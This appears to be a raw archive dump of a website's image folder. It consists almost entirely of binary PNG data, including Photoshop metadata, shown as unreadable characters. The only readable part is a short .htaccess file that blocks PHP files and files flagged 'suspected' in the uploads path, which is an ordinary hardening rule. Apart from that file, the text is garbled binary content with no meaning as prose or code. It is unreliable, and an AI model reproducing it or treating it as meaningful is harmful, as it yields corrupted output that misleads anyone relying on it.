R�9�yGZ����&�su���ƒƅ���=c�;��twUI$�e\P����]%�"�Df�c���jF%x��^Mw�ٔ�a�AM�V�La
��0Qk�,O�.�V���Kf%Gnu�6�����O��sTc-�D��3�}X^�v�
�+�"�&jz�KY�n����N��To�,Ǔ������̹X?
��B�����q�霂3,�;�Ÿ���+���lu��
Q��aQ���[X�,�����o���Z�U�&a��p�q%�	� ��A���-w�O}�Fa���ޞ��{��V�������i~κ�#��{w<�	&"�ܴ�����m,}.:q�1�{&6��c���!�Z4'H�������'kYf�'g��Zy�"�T�7��I��s� Kal���H�Y�E�=f�V�o.����_�6���_�d��Ⱦ���p�rA=�ϝ��}8~t�ڊyt�h�q�\]���ض��͛tț#�����?�P�gWU�C�I�59a@�~<��O�L����.�Y��@��y��|��(���>����|8����x��Ƿ��߼!2�*}>>Sm�(b�[��Lk�W6�纝�Y�~|����Ih�a���E^����z�u�Z\���=^|�r�iw�w�N����%t�5&���k�S�6ܺ7j��(�XL�wW�	��M�..�&x�Ӄ��˴��`�mk�б��������|�@��(��_�wX��w�q}�2ek�i�i6;f:�A}������ A�Կl=��>?ზ0��S�V�lD��mlZ�پ�P*v�/h�~�sd���{X��,N���		�u��s���P��0I�u�l;�a|3�u���<9��'�.\�q����͞��>����S+
��R[��hW���*���/�t�_�ӌz�_�!>=G��Y���z�,s��!ϓil@�jx���_�K1K�Y�V�{F�:x��V0�y,祶�>m��ݓ�R�3�fVQ$4F��s�Y���B..Y�X]�G�������~��k�0�h�϶�� i�Y���8���@�R�A��;o���0ۉl8
=���;�/����?c�`B!�����~�<M
*ť��G=mTƳXˆ���<�̵_ݧV�^�|<\7:�p�S��jC�����[���[س�lwA��ל��.�a�#*t8�"�C� 	d�_��ir�����|�N���Ҡ@����k�aw�'�ׁ�JTl���s�Lv��c,�G�1c�������>�k#>�����NN�f�ch�?�d��9��Ѐj��ݤ�}�����it�6���:1b�g����!�,�BK�_?~�Y��)�#r��N�wC!q�d�/�]��Lm��Õ�A/�^�I�t��������) ���vvb���[s���K�UY�+0qӡ�/Re_�}�ʚ�r�����vYZ���f ��m��K��<m'0\�*)�9��gKxX�E���C&��P~�B��H/Q^�!���G��4�c�S4XӴ�!�`��7�A�fkF"	)�Z}(��+�p�<Eh����	Y�m�4�|�7'��&2��J/]ckyغֲ��l/�
B��T�j�e�c^�GC�@v;�o.s��s#I(�P�J��o^-�N/�Z���xI��	��=3v�ס0�V��k�}��.nA��@J��3�z�*V'V���E�|��������W��H��N��[V@ϡ�5"d!lNe�`U�ؿ���mHc^�b�g2�k���2I��>�_63=R��:�n{���+U��h+f$�),M�Y#�xf�����nʲ����X�țN2 "��>_�S���bT;g{����b�Xx���)>?��6�"���\~c7�s�qM��)�w��:�9-�'�d��fP���A<�5��(�����Ӕ?��.VϤ~��t�k��|���4Y%K��u���ɤ�~���ɠ�{���ym������b�
Q�Uym���X�m$�Q��E1}�74$\!����)vӈ�\G�J�ԉ9�AtT�ܱ�\�r�)��9H�x�MN�8�h�>&����_,��(������'����-��]��q���Jй�^ө���pL��D�:�'-�m�}�Q��m�y���]پ�\VÐ"{�Џ��'�6Bk�[�3�
ݪ�*T�^U��{����!lTl�yc��6�$�ݖ�b�m���6�6��Ŋ�ܖ�SؔWK;,Y�Q/F�
W�f��(ݭB��NI��ĭ�uB¢tDd�ğ���E��ӧ�01Ә�:u����9uΓ�H����ٟ�qh��4N�a�m��_�?�X^pP׿X�*]�Ýp�owCH������p�4wc	�b֜sZ9��E�E���%+�٢�+��{�a����@���<�!Z�ʺ�V&q+����p>�V^��#��Ϭ�4v�-�b��n_g�e�	6��B�l�8ft�ۄ�jt�>�]ߦ��7� �ڹ��ώ7:	�^�g����
�O�3Z���7�;N#AFC�z�jIv�r����ف [��tc�M7���y��1�K-�䩂�_a���ךz
�𻱣��ȉ���@�ӹ�rJ�M~��e���߼k��N^�'�t�L"�a�&س]��O�����
�h���Ϟfz����%߉^|�5�#�ף
��g��ڜ���!�J\�^'���̕R�k%�$�(d5�)$��y�����WF�ݏ��l��GvQW�7j��d
��O��:DT$��*xۙ���!�wp=�7+�����t؃��|rM~�����]'{�G��ߙvUN����,�\�d�?�:E�#:��
��yCH{D����l�S�����g���v��Mj�!�`
�O�5C]�Ȗ?��B܆!��]�$*�/8Ul�l��`���ʈ�]��G���C�i2�w}����vv��#� <�)|�=�A���M!@�d�ov���N.l�m����-��e>o2�#�
���)U�Eȑ�)L�)8��8&���0�:�#�t��+n�[�m��n��A����Ӽx�
+`$��{ɱ����
�AO��3*��ѼOЄ����%T��1�ᗴz>٪A�l�|�84��1�KV%��ֲ��l�a��
+R���A8y�����.d[)TN��{RO-d"����S�<U`,>5���L/��%�S����Ⱦlk
�`E`	[E>��rh�
��N[>�:�6�j3��n�Ƭ:������
!	�X�eIg�#7�cQ|���)��r����(�hT'���*�D6�w�7> �S��>�Q�f�mӳ�`6����l��p����;�|�.�Gq�O���&S�"�>!$���y�ڰv��qR�)H�����*}�+�-�X�h�b�! rȁ�����`s��q�w���u����N�;tt�8��h濲�4*��Z͡4�)�w��x�k��^�ڀ�1���__�'��ț1��^˟�Լ����F����J��Wu~�8�~}RTv�w[�q�qR[z䵦�@�z�vmĀIa�������6K̹�����Y��vQZS�uĽu�C�Se�]��Q+�
K�XqDfh=ơ����Q�N�Ó�
�|B��-�ϴ������l�W��"}�&)�W�s��n�-L�ir��O[��ټ�W��)�͋�q�L�j��f��%.L7t̉�l��Ie���O��Җ����F����%-?lXߜ٬v�}w\�}�A
y̶���$m)Ҕ�ZA劓!-��Bz�3m%���_�N�v
)���Α.�T����6��!�I�h��0'��t *�6Oײ)-�fq{���ŵ�8ͧ����-�B�<�pK����E�2=��V��V�F}��I�>�)��i�&M��i#׉.K��4"C���3h7@m�d����)�i�sn{:��8ۘEW]V��Ԧ�u������4;A%2��̽�3�L�Fr0���Y��	�Xt��8	x��%��L�KklR^`��u�>��'?����0���S�I>�٧
��`���s�y�g遀�">�0�*hv]n3��]�/ɛ.�!��T{SN�����dvr�����?��?>x����딺HP-=@�����9#ګW2PB��v�d��oY��6k|��dn�����c�>�ܿ�{Ҥ%���F�>V���r���'�}�Y��N�m�M�hy8 N�����:.�L�6���*�h��HXkF�V���^Q��K��o�����}*���kC~zF�{���.���x��xOb�I�ڇ$���:�����n-���l?8�-��lA��%O�o�����}����k��k�B��y"Q�WaI�VN��u�Yp��p�gv� ̋y�p; �T�֍�� 9u������;)8�Y�������B��j���?��C�gP��w�)*���"���'��6��a)J`Qw,o�]}A�'��¿S�&@HuK���@#!���9yG0��о:uz�/�X%mj!����sK}�Y��B�u��3rw-�
��H�x��<�C�IOB���y�����{A�{�ٛ�u�nv{`G��-8K�D�
�T���SM�F���.LZ�G)�0�?j�Wlrb��K�͐
T��C;v-��YqO@q��&���#��)k��#�f�>څƠ�EwP�
ֲ���(�f���?K̦6�غVS�q.�xh
^�GuJ���ƃ��ۦ? �x�3�=�g�(�u�'�rW�.�Ij�fdS�S`�>b~" [�dQ�5w��lߧ��uPϰO>����q��=��
H���E�'�(��~�".��|�o�D�C��`s.N�=
�UʴV�wϦN�3�7��Z�Bc�+�&�)ߕw?*�!�~�8�,.8����wʄ�u|$�%�%ok>jV3�]a-l�����E��u*]0�“j�7uI�,׵�۱�ܤ�c��;��'L�s8���y���x���=�ٵ��li
��?��k�3~��~��k�ٜ7}���^�"+hg}T��)q
	\���k���-�>���ᾬh����`#��l�x�x>�7����Q�ni{�h�5�N�f<���l�-�^����n:i�>s+:L[5l�:�3�n^�hnϒ��/RR�,_�QgZ9�|��U7qW	?��2�-�C,\��P��~-���Y�Y�;����oz��f��������ʩ���H��pu��.Ǿ3��Ԁx�;O��ӆ��l�RUY���d�A���'��>�C>��REjT(_ע�^�����鲌�����L�	 ��8�t�6�J�IV<�6*>o�=��[���9N�/s�Y,8�S6�1g�#��$��d\�
s��0����;r�}��;�4� �����v&�4���t@="�%O�w�ӿ$�)�^�+N�R`'f��0�"�_�3��v���oNA�%W�P�
Gw��&�3�Z������mFqz4&2N�YL��Ms�=+�V��6o#rg�"VWb��#�&�ϩ����]L:�J�3x���E_kU��҃X��l@���@5��o����N��h	Jt0�nL����h������n�z�)�q�@u�<0���Zp�?LTw?���Z��"8`��hf�т��!�zv'�mN&�]/q(t�.������uܮ_��>�3�;ez{����	
�ύ�@uE��3;�#��>�����:��ƹW�t����du�J!���Ύ,y~/ѡ$q���F�3;`�O�}>c�
�ڄE,�3*V���3'�mN��s���C:x_a�~�g�ܸM�Gu|���5,�9,�{Ā����/�
�� f���I���9�Cɥ<�)�B�=��>�|�m
Y�ʾnF�a��U=>��r#�WUq�����U"�*��L#Jҕ!(D�]��t���p��m$g�fsT�vӌ�f����R�e4�ő�V.z�{�A���pZʞ���d��M��J���?p��q��]�Ad�5�W��*�R��>x����Npx�4Ϯ
*/�yNA�e�#��}�
�9ڤ-�N���ۼ�/�+�jDb��m���I�]���7M�OQR�c���x4v�P��PY��`���r����3�$f��@՛�����鎶1U���dX}��)L��Hy"�bS���,���c�o}��Qv/���,�7k/�?Dю�=}��e�PtI^mA��^�g�u�s��{u�<l�m�xV۽Vk
R��;M�G��Ztޘ��_�:V\���<OY㸀���ެy�	�1�(�gz~�J�_������ڐ��!U>��ȭ!�g�������	'<,İ�r�K}�-a��&|��at6�&���OJWrK,۱������%S��(AF�2��_XpJv;^�8t�)l�5���^�U����'3�T�ǹ�i��6�Nr���p?p���]��_�g��<)EhRҺh%��]�"��T�l��||_L�õ�6�}|�x����O7m��F��n,
q�'�Ѵ	�&~w7!��&�t�c��1�cr��i}�7�(�*[˔&3�9=��C�\��<G���������/�E9� Cq�� �݇������;�9�@f�����Wg�`��f�`B"�/W-Y^0�y,9_�c��CTV�Z�
0���B흗9E�o�ZyE�wpl���-�
g������G�����M�rR`z(v��iz�y�W%Ư+���G8	C ��k�eO���T�:e�顛 �̼)��İ�\�W��'N���~Z�3"�m�|�����V��
2b/�@ʔ�7��v���vۘ�q��$�;M���)�\��L��4GU'(�����b(Z����)x��JV�ߓ�?~�}�[��}"�S!N�P�:�sg�f=^�B���^��2@Y�Vf�DyeQL����ݶ��n�Id�7��t���f[9���]im"/�U..�d�;#Pѣ�(r�a�<��6͠�v�V�*�s|�}�ת7��8�������d$p����v{YXٽ�K�9�򹷡͸XX�U�^w�����[a���?����|�~��ж5�E���N��O.��o������,�/	N]È(�Z�������5)�6���x,��'
���߃ȗ�m����O��<���).�\7Qp3�ɉa0)y�Z����#����M*��*sm��f�[�r�5D	��5��x�s��#iZ���v3>ڇa�������*��(�1���+��iQ�E׀;@�e�Yp�~?�'I��l�S��rtQ$\�!N󸉧�ú���8T�w�u��P�!��}{O��f��٥�}3x	ELw�ʰux��(�����{�b ��a{�z�?{��j�[0�g�(�3qf+��u9{1�ܱ����wd�$A��	�����)����Z��ޢ�V����vx�aP��<�\�_h��J���jU�N�#J�l��{��fc!M��b�&3�#�Ըo^NzB{���=��^,.l���5�f%�C�xL>��,�8�P�6�g����f'C�6\Ue����/n�|�'����d��"z��8��`�/���^dOЄ�8��T�aq�d��iɊ�Vў%H�f���E;MQzr���{s扥xv�|�ƣ��#�]��VxJ��h��5��)R��LN����B\�Y���>�}h��>�n�$x�B!ow��x���
�a��b�{���\�-Ԣ�&b6m��)�;�WIP
�!W��y�L_��B�6C4��S�k�����u��& �qy�`17CZ��$���,Q�y��:
�?���7���Ͽ)к_����:�W�.6����H<q�v_B	�F�_l�7ׅ��c�� �i�q��x�UGs�,RͭZ��GQlu2�ԑ�Z�{�c>lX���A�O�p�y��B�Wn��g���\���;H�+��ڄ��mw��e�����jv@�z���0_�`4�0�
�t����מ��#}��:�)����Mj�	iʼn�mR��q�:[нs=��uv`�Kҕ�
UbCaP��mK�.<����Qg� j:U�%�l�������{"�%�)KE���:�� v�F``�������\�#�rƈe������
��15/	>i�A��J�Y=(G����3|R�:�	@�G�5���<m�A�5�T'{𔝹у�tR�y�❼�|~������o�/nw��D8��4n"8���\�J=
$,B�0�;7�b���u�.�	.Op#��L�,%N���<I���NO4橞�G.tZ�ѳ��N�9"��S�	O���l*R.��6O�=����F��Ԏ��ms|Y7�ĮaRtZ��"B-���c:�4�o��R*L��m��ry*{��1�M:��*�k�h:�Vζ4�g���'�(j�,����4/чBr$�ek�����[��9�=�=�mVh���驮yR�J�&�s�Τ�4ewW+�%�.�L���#7��B
p�z?��#��eer���p�N���j��k�IZ�]��l�&��Li]z��0S���)������P�ʰ<�L��������X�u�Bdl�»��Xg�s�eϩ�_�a�8��}��fή[�]���͚��vs����rX��l�Mt�X����%�^�pW�
��D�DW&�a�}���4;�]xr�Z;�Q�����c��b}m�q����%'~��g�c
�hY7L�[ �#���k�
Q<P/����w�_?�?(����O�]���H0⅛���f�D������r�͸�F�*���:Ao<Tm�d�>4R9�p�����˴C��dHp1�~�f4%Z���B��&�k�(�G0��j�Ow:9�#؍�� ��D�2��vA\��c�P�縍&�LVm��r�����~�<ܙ����Q̪u{|ȃ\�$�l�!6Ӂ�0nqt��d�?(�#O��0�����w�|z��5��\M$=���x*�U���R���3����\�i*��tJPU��08�(ٷ���R�����9[f�Ld|?��n��!����ʣ8+���P�q���x�SN�b�S5���P�����y�}/4{d��)f�
g���6�d)OˑfS�}q=r�Y���Ym��+�Ic��E�O��}h�n�R[�sT4����mT#����±�$ާ$��޴r����a<+��S�Έk1��N�*�|O��f��kv7��elz?�y�����l�'�	�7�<�9��N;�F����2��V(��簆 ,[�#�H� ��{��S	�Č6��/*o����Z�z��}��B$d�i5�,�!2����rשY{?8���>��b�:t*g�Rʟܴ�\����tR5,���c��^��mʦ{i���������PN	U(��>����d5B%=�lm�o��TK��e_���nr#��Ֆ����K��E�Xl�їP��/z�=��U�����d&u�P����}��6S"E4�S����8H(h�;,i���0*h��n	�����E�X�y?t���Z`/�q{�����2v[{��Uܯr�X��5���LQ��Z�Ѝ�E{óV��0��(�X�8��qcT�shF���6b6���<��ȱ�y6�1:ٛ�0����h�Q��ۊ�C�R�櫡 n�@�O���w���
�t9�5�"����{�3�[ ��E5�t���0ϧg�”jw��FY��m���@�|�g?+��KQ:�O���?@��|i��<Z���qr����g;A��5���4[��K�`y�.����[�$�`��V�n	e���[Ԅ�n9=�l̇M+�T5B�Q�^x���2�IyH��!)���,���p�蓾Ԭ�Pn�[�P���Q�pΗd��`��-\t�m^$��s���a�I������@���&�ӀOe�ǵ�I�[��G|3�����x��Iy�ӄ9µ�lߞ{�r��0���[�^?A/�kw�p}P���I���)�
~�g(�Z�:�T��y��i˶���U�f�)��v��/܊����$g��3�6���S�����e�\m�؄+
�S�x�R ��x�{�������XS��,z�F,h6 J8#eq#%��!v�Z�b<ފg����Y�@{�3��KԞx����iL�${�G�Y'&�
uGDm�5��A�\����C>C�cko�Hi����^��b���h
r��lNؽ�;�/Q���k
���[��{�)�dO��30B������K_mr�����M��cgW�I�O������)��
g�'+ϻ�9��P�I�?��E`չ�p�.="U�D^E�����o��Mw
<S'G~�0�_Յ����G�Ԣꇉ�=ҐLI�K䡪Ix��d���}feL��!=�%�4�
~��|�G�B���ix��h2������q=�kB�s^��>���	K���ݛְ�Ĵ�ջ<v?�Ҭ��m�a@sۃ3+K�E�*T}�a��9�i쀢_'�����}޶��]7��*�$����WQp\�ȣ��*��Cm`����u�y3�S����W�wa�i�8��ȃ���l0K��"���)6P]1�
pyps[�;��v�;�&�DmҿZH�'/:��
�@��{�����#K`C��b[���rLi
M�h�*l|���>e��`D�ͽ�{��yOx$p2�v�T,�l�U�ޱ�%7H��h>��Ɗ�{Dղ�����#m�jc#!�T��s�n!_��O�8��v{xY$�ws;�e��]X�8L��6D��ǟN�كV7N�d��ޚM߄^l��A,ֿ�4�\�oL�������>��)�T���	�+�]��2O筝���v��o8�����(^P%J`w��3���Sµ��{}w��}?#��|Nb���I�>�5��@qڵ!�݌�u�%�C'H�2�sl쎅�xv-�M?�u2����=���m���S�JQ�P�B14[�}�zh��w��Ý��٬��[ӟOL�N��1	�B��X����|/�}�ߣ��lf&�if��y��0x���th.>�q�Q����sT�+lf�*��jc�[�ۍ��m�X��x�U[�1�`#ە������wW��J�1���D��C�97t"6(�Ѫ�F�����}V�l�4�qV���y�V9з7"�GؖP
'e^O_���~�[;�
��VL�	f�6C����/[�;��p��6�0Ո'o(e��Q�Tb�M��2
�N��_���CmHi����3q���m��)��g~��5c�B�#xp1|rF!;V2�-N��+>ܚ��ȍƃ��f�^e+6���%�gZ�*7l<`F�=���"4=H�:^�c����k>h�D����N�T���(����J�O�����J�s,\ߏ�\�@�{��)g��nєѕс�:(i��9�T0��v@t�0��!Xb#K#�x�aO;�+�l^d��X���z
-V�uu��7����{�w��|O�mrx[���^���V��c��	�%�}-�R�3wg��Ď�oaO�~2K�w�NI�&�����rg��hm�p����*T�C��'g����gΜG.�K�J2���9�gFv��KD2x��D���b�

�)IސSZhV݇�ק15$OڂNz�2AD����ͱ�b�s�;�sq��6d_��s��Z"�`�>��ࢼ��}OgsQx>=�RX�
���uAa�lfA�[2I="(تs�1γ�c����5��x_��3,�ͩ1�G��o��T!T��UR������Ω���I�1ҩ�%O�h~aE�4�!��~�T��wb�W^*���I�i���=E�UC�(�,��{'�l����z�*��(-�k,8�/�3�jf�7���C7��Z��5�hO�>=�hZF�֥��~6
)�wl�d����j�s�l�~j�LE����3�@��ܔb#ȄEl�P���U���%N�굨-BJ��U<'E�����t~qF|l�@�s90\��	w�͵m���${Z���ȡ��g�5^�HA�*n�?� m,�y`P��e��7+�C~��
F���F욞��øQ��t�0#,�d*��'W�$_--��1D�ݭ�L��7�E�}�e�����C��w�%�V����n+�,,NlY��8�ً�n�y�������V��"���*��kUj��*M�[
�1ԪxTY$X�	��uO���E2Wد�.5�j+��d����g����<Ca^��vʾ��_���gL��#�w�#
�<�.FŦ��YK�sŃ��X9�5hL���љHfB�
�D��������Bv��!bQ)MK�?�M�wk��m�/
��b��=�|q��)��ޜ��5���DT�P�;��7ɚ���<o����4{珯߲CH�
��<�r�V���q-S��z��I��:��<`�	��pd������.L%�WU��y�5��}����|i��×5
T�7���4�n�7�͓����5�9̫�&m�&�x��i:���*u�8v���4?������(c�d=����(<����y
���y�(J����&�J]�d�>�|�q�P�����3\��w���l���n/痸�P���6T���d��D���'�Ò��X������ԙMU(�0�Qkczi�罭˪S�!�<MBTO�Z��6���'�;Z�ܠwn�\ Ѣ�5�J�%�e��4��6ΓT��	]e�
��ޯ#n��P
�B?�P���fYy�S-L���)lx>�Ut1v���㊸y��+��'�.��™V��hC@	���&�՞nUn%N	A��ߦ0-6���k\���$6�d1V�H�-<����f�,�qw{�I����x�J}��9wjZ����S��NqiC3TC'<<gA9S.�������^�|��rFDƬY`�heJ�%"�hjC�a4!�,q"�M�
pf{0��  ��4���se�>�D4���
��3i��Rd��ÍV]��6`	�7��.U|��м��6����F����9�P
�J�E҆y߮g�����ځ1�d������:�Dd�@��n���
?������5	9�H��M�
�>	nM���*�ΥLk���$O�
�ߟ�8�m<g���p4lf�Pg�
3e�_Tm��ۻ�Ժ��P�qEI�	�K����7�Nή��1�C9����Y���˦���e�o�6�l?�Ӏ���(�w�Y=G�{�H,��*Gi��1q�%T��O���	��5՜s�a?��Ӽ�ȕV�T̤��4T�����Itٮg��ϟ3Y��3Ip��ڐ���D��V]<\c���&�o�p����*n��aL�h�>a�k�R�Aᕾ�1��P�_́
�B,��=�lC�{��P�3g�'Py�F���^���$[����1s��T�IC��4��:K��!��c�D��hp��6��l�������X�9�:��4�w%n�4��pY��_�Y����Z$a��i�@��i���~��_�+�9����c�#^k��Rd�z��{q���^�e�iS�X��~�32���\Rv��	�N1�D\[�1f���,2p�@��I`Hkh_����a��X�D�wp�]�3�[�O�k.�`����Y����T�����.k�+���;���U��u�G�'�ׅsƍ"�naڰ�@���d�{��_��vS�{�;�H8�f�M�<F���B��������"m1L����A,�ۇ�8�d�H��)�z�PD�y��1j>~3f3����p���^pZy?`3���-���ӯ��T�Z�����R&&Co�����*^h�9=7��'κC�Y�28u�"�9�zp$@r�\؝�"�X��b�p����_�����CI�ֽ��~�g�ѡPd��C�V)�tSS�V�p*eϕ}��U��Mh#p��y�]�c���<{>gVBA|Nm����]y�lP�y��d�3#��Gp)�x�2Vk`�K�p�TQ�':ڔ#S�^X&g�� fZ�N��8<��`�3p��	�#즨��X��"���?%����j�Hw���B
�{�IEND�B`�images/02/01/.htaccess000044400000000424152434416630010256 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/02/01/upload.png000060400000007652152434416630010462 0ustar00�PNG


IHDR) �oQ>	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F�IDATx�̘iLTg��;�# 8B�Z�Nu*ո��jUB
ֶ��%������&�VS��D[�bcB-�
�FE#.�8*(�,�:��,�!�!Ȍ`���1�~�s�=�=���t���X
�3t�5 ���tA�d�>z����ID��2�7�<䇴l
n�n4K��sv�|��Q�h&��
F	0$��t2w7h���W9��-H$B���/)scI��L*q�mȴ#W�u�R�s����rKgG�
����*7�~����wʧ��ip!�����|��$��~R����~=��a��߀�n��ɑ�%�}����
A"`�٩�5��fu��K��M��H��N'A���ӿ��P�2�������fK�Պ�
jȻz���JR?��R!s�ug���U3&З����(]Z{�T�n?uݒM��: |���?�C�p�����g�*(%3��:Sk���eH���15?!��H��[%^SȥL�gb�?3�Ƴn�QT5�:�_��ז ���#�i�\�Fi%��^%3���Z�h�mk��x-_v[�W-���-�ǃ�i�<w�qA~�r>QF2),��q���7�Y1����v ��&�e��+���%:mvޏ�Z�tr��
�R@ٓ�^u�QU#�f:_/$��f!-�V��6���
��V�W�;<ki��R��J<U����il#64$�e�݋�����E��;=�X�<���Q*'plv�'n05f,��?�I�Xg���K�$iz��`T5r�jY��b�b=J���gEq�����ٓ]��$=2����$ψ���~�[� uŋ�.�=�^����s�!~κ@E���K��{���a���jvd�s��ۚ���DM)VC~Z5�NA�����G=�p:�:]̩��L
!p�7v�����\�����	Q�Y�0^�׏�Ml�dKgGc���ۢ�Mm��|���[ͦ��Pȥ�U�-���V"C�7�\�zt/�;�e��&>NG����}�im��;��ا?�iɔ9��Tq��>
f�i�B&E.��n�aw8zu��)1cH�+B���9%�F��rA��2��ES�X45l����o �x�o�Ǯ3+~!:����\��5����y*�؝]08�Rۤ��
���f�F��-u�(z+�u� ��ϠB.K�aYb�Kk�u&�J	��q{���!�ڸ= M�j�m�j�����������{�~IEND�B`�images/02/01/previous.png000060400000124260152434416630011045 0ustar00�PNG


IHDR�7ن��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4A9C0B485B5B11E39747E64E0AB8B127" xmpMM:DocumentID="xmp.did:4A9C0B495B5B11E39747E64E0AB8B127"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4A9C0B465B5B11E39747E64E0AB8B127" stRef:documentID="xmp.did:4A9C0B475B5B11E39747E64E0AB8B127"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��$IDATx�\�k�n�z4s>����o�M���b9Ԗ�����$��"��	��a��KS�11��?M�!�!��%#"JH*� �`+l,P�n���z��s���������}�3�c܇����?��?�?�ZRJ9���:~�>���ӛ��>I���{O���K�9��K��=�t�?���9�-����//�뎔Ɨ�˚�e��<�ï���uƏ˲�����9m���2~�3�y��=����o�Ҳ�n�u�e<W�s:�޷m��x�R�~���__����>��$|Bǥ֧�ڸ^�u�,�}+0.�\��/_�g�Tֱ^eM���_k�X���7��um,y�[Z�%����vt���x��ke�}ǿ�n�3�wť����Z��N�ڿ�����/����q�^UZ�:�_�K�s�4�+�5w�]����Im�{Y>p�{��Y�g<=]�\\�9��sO�]��0�S���~�>�|t<�X�CkXpͱ	��_�~��������U������Oލ?�t�^�X�u����~�{�~���>����P��-	�T��kO�g|��}���i�{����R�ú�j��x>�3���j�gd]���v{v\�w�w8�g�
/����:�>ƞ�z��m����qM<+��zK~h�x����t=-���\I������6>��k/<��'7�X�׶t�y�c-�k>;�b�y�֕���������}؀�⳱��)~�</�{����y|և����%=?��cOd�7�_��k����~���\�q�7؋�:^{���7^���/�;����ǞO<���7�I���[�8���D��{�>�6~nc-�8{	�
�^�5�>|���������zS�x����`L�~s��m<p>���x���,�.�v.����q�˺���g��w�}�`
���zK�aSa{�`z�u�{��'���������eX�>`�+�7��1v����|���t�\�m}��m�L�/c_c_u��xN��m\�?�s铷��O��}�����<ڊ�w������^�WO�	X%��V�u�����ω�X�gco�}��>���e����͛�F��~	�3��<�Y��/�8�K�����{�����]*�\,�e�7e��E{vO���.xa8(advl����޽��N{��@bU��Ѳ�Ñy��߱���` �t��vl�^/����N�_�����s3il�N�s�	'�o��<|-�����6�
Ʀ��v�N���V>{?�<��:6i��;^�$��&#���Bb��E�v�_�s/)����R�����eYf��@/ه3���:���>P����}f��1�t�d�.ג6T�z��z��T<���N��`��d��/t�VeĪ�F��g�C��&���LJ��I���:�]��;�Q���b�����~��)7@�wc�߾e����qx�����
���������a8��s���x�EA׬`�v
